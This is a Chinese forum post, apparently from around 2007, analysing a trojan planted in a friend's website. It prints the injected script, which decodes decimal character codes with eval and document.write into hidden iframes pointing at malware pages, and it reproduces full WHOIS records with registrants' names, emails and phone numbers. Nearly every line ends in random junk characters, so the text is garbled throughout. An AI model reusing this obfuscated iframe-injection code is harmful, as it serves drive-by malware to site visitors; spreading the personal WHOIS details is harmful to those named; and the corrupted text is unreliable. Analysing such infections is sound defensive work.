[原创]一篇刚写的分析木马手记

首发在我的博客里面， `?T::&`  
J3+qnT8X  
http://www.areway.cn/?p=175 ,1~B7Zd  
((?"2 }1r  
TlO=dLR7d  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： Obu 6k[BE.  
          !C4)P3k  
<script>t=’60,105,102,114,97,109,101, .WeSU0XG  
32,115,114,99,61,104,116,116,112,58,47,47, l_2Xao$  
102,114,101,101,46,117,45,117,117,117,46,99, &n]v  
110,47,101,114,114,111,114,46,104,116,109, -7oIphJ=\  
32,119,105,100,116,104,61,49,48,48,32,104, Z9H2! Cp  
101,105,103,104,116,61,48,62,60,47,105,102, C
m5L99Y  
114,97,109,101,62′; DmWa!5  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> Mmgm6{  
                                                                                                  C-_u`|jQ  
<script>t=’60,105,102,114,97,109,101,32,115, r:rPzq1  
114,99,61,104,116,116,112,58,47,47,102,114, Bd*Ok]  
101,101,46,117,45,117,117,117,46,99,110,47, ^69(V LK  
101,114,114,111,114,46,104,116,109,32,119, TN Z-0  
105,100,116,104,61,49,48,48,32,104,101,105, Y8}y
0]V  
103,104,116,61,48,62,60,47,105,102,114,97, 9k4z__Ke  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); F)=<|,b1  
document.write(t);</script> %X}D(_  
                                                                                                  XiV*d06{  
<html xmlns=” ;Ym6ey0t  
http://www.w3.org/1999/xhtml  Za,o  
“> 0(C[][a*u  
<head> E690'\)31  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> 3p-SpUvp  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> I+Y Z+  
<title>首页 - 爱生活家庭网 RYl{89  
                                                                                                                                                    cEXd#TlY~X  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 C(sz/x?11  
转换字符串后的大概内容是（谁点击后果自付）： w3iX "w  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… n\7>_  
                                                                                                                                  Z3<lJk\Y  
查询玉米u-uuu.cn的详细信息： W-D4" G@  
Domain Name: u-uuu.cn X+;#^A3  
ROID: 20070901s10001s64972306-cn ld%#.~Q  
Domain Status: ok aR
)UHxvX  
Registrant Organization: 王雷 M~X~2`fFH  
Registrant Name: 王雷 Mu.tq~b >  
Administrative Email: czlovexs@126.com e\#aQ1?"  
Sponsoring Registrar: 北京万网志成科技有限公司 e2xKo1?I  
Name Server:ns.yovole.com )-6>!6hZ  
Name Server:ns1.yovole.com ~urk Uz  
Registration Date: 2007-09-01 17:54 zzC{I@b
 
Expiration Date: 2008-09-01 17:54 /^i_tLgb  
最后PING了一下地址 都没有什么…. YY>&R'3[  
                                                                                               
17:7w  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. 2#R0Bd  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> K-(C5 "j_  
<script language=”javascript” src=” 7wrRIeES  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script t|&hXh{  
> AHa]=ka>  
这个玉米应该有可能是木马作者的： C-:|A* z  
foafau.info的详细信息： < A`srmS?  
Access to INFO WHOIS information is provided to assist persons in svCm}`  
determining the contents of a domain name registration record in the EAs^i+/  
Afilias registry database. The data in this record is provided by RR`\q>|  
Afilias Limited for informational purposes only, and Afilias does not 1mv5B t  
guarantee its accuracy.  This service is intended only for query-based fTy{`}>  
access. You agree that you will use this data only for lawful purposes pm}_\_  
and that, under no circumstances will you use this data to: (a) allow, 5:~ zlg  
enable, or otherwise support the transmission by e-mail, telephone, or n>o=RQ2  
facsimile of mass unsolicited, commercial advertising or solicitations qe uc^+P;  
to entities other than the data recipient’s own existing customers; or 98|1K>C  
(b) enable high volume, automated, electronic processes that send %@I= $8j  
queries or data to the systems of Registry Operator, a Registrar, or 9)F$){G]vs  
Afilias except as reasonably necessary to register domain names or XU['lr&,W  
modify existing registrations. All rights reserved. Afilias reserves p%Ns f[1>  
the right to modify these terms at any time. By submitting this query, wLq#,X>%B  
you agree to abide by this policy. wG 5H^>6u>  
Domain ID:D22418703-LRMS [MAvU?;  
Domain Name:FOAFAU.INFO E0A[{UA   
Created On:20-Nov-2007 16:05:42 UTC -t*P=V|@  
Last Updated On:20-Nov-2007 16:05:44 UTC q)"yP\  
Expiration Date:20-Nov-2008 16:05:42 UTC M VE:JNm  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) xM&`>`;^e  
Status:CLIENT DELETE PROHIBITED 4SkCV  
Status:CLIENT RENEW PROHIBITED EBmkKiI;  
Status:CLIENT TRANSFER PROHIBITED ?;rRR48T9E  
Status:CLIENT UPDATE PROHIBITED 9:!V":8q  
Status:TRANSFER PROHIBITED {FNCC*=  
Registrant ID:GODA-040110615 %zjyZ{=  
Registrant Name:liu hong t4zKI~cO  
Registrant Organization: }.A \;FDyj  
Registrant Street1:beijing {o%OG/!1  
Registrant Street2: UJ)(Sw  
Registrant Street3: OQ3IkE`G  
Registrant City:beijing ^Y"|2 :  
Registrant State/Province: oPxh+|0?  
Registrant Postal Code:100000 C7l4X8\w  
Registrant Country:CN }F_=.w0  
Registrant Phone:+86.860108888777 7Zh#7jiZ`  
Registrant Phone Ext.:
9KU3)%U  
Registrant FAX: 9 b&HqkXX  
Registrant FAX Ext.: PmUq~YZ7  
Registrant Email:bbbshiji@163.com e=i9l  
Admin ID:GODA-240110615 gue~aqtJ  
Admin Name:liu hong ()_^:WQO?  
Admin Organization: O2~Q(q'   
Admin Street1:beijing x,<|<W5<%  
Admin Street2: Gbb*p+(  
Admin Street3: o3:h!(#G  
Admin City:beijing }vX1@n7T6  
Admin State/Province: 
{>yy3(N  
Admin Postal Code:100000
.UUT@ w?  
Admin Country:CN .A7ON1lc^C  
Admin Phone:+86.860108888777 ?J5E.7o  
Admin Phone Ext.: T mH5+  
Admin FAX: na|23
jz4  
Admin FAX Ext.: K!tM "`a  
Admin Email:bbbshiji@163.com )9{!=k  
Billing ID:GODA-340110615 D' h%.  
Billing Name:liu hong X$<CIZ  
Billing Organization: a;G
>56iw  
Billing Street1:beijing 70A* !v  
Billing Street2: Zx|VOl,;  
Billing Street3: E7U.>8C  
Billing City:beijing Ye\&_w"  
Billing State/Province: \2[  
Billing Postal Code:100000 qD(dAU  
Billing Country:CN 0w".o!2\U{  
Billing Phone:+86.860108888777 {G-y7y+
E  
Billing Phone Ext.: Z"9D1Uk  
Billing FAX: Oz5Ze/HBN  
Billing FAX Ext.: YZc{\~d  
Billing Email:bbbshiji@163.com 1{CVd m<9  
Tech ID:GODA-140110615 $btk48a7  
Tech Name:liu hong P\2x9T  
Tech Organization: N}\3UHtO  
Tech Street1:beijing U1pwk[  
Tech Street2: pE]s>Ta  
Tech Street3: sWMY Lo  
Tech City:beijing )#Id=c  
Tech State/Province: M
^y5 Dep  
Tech Postal Code:100000 KD8,a+GL  
Tech Country:CN z#srgyLt  
Tech Phone:+86.860108888777 (p?B=  
Tech Phone Ext.: >'{'v[qR[G  
Tech FAX: xU;Q~(  
Tech FAX Ext.: 5J*h7  
Tech Email:bbbshiji@163.com MgQb"
qx  
Name Server:NS27.DOMAINCONTROL.COM $$---Y  
Name Server:NS28.DOMAINCONTROL.COM *qw//W  
Name Server: bP1]:^ x@W  
Name Server: 3Ebk
q[/*%  
Name Server: 4nD U-P#f  
Name Server: >^adxXw.o  
Name Server: 9y*pn|A[F  
Name Server: F t;[>o  
Name Server: BA`K,#Ft7  
Name Server: 6z1>(Za7>  
Name Server: <w0$0ku  
Name Server: 'zx1kq1  
Name Server: `;3fnTI:1  
                                                                                                          O.'\GM  
接着下载每个文件里面的代码： b[my5Ol  
一步一步看.. HAGpM\Qa  
@l&>C#K\  
:cE~\BS&  
`j(-y`fo  
uVLKR PY  
LVNJlRK  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来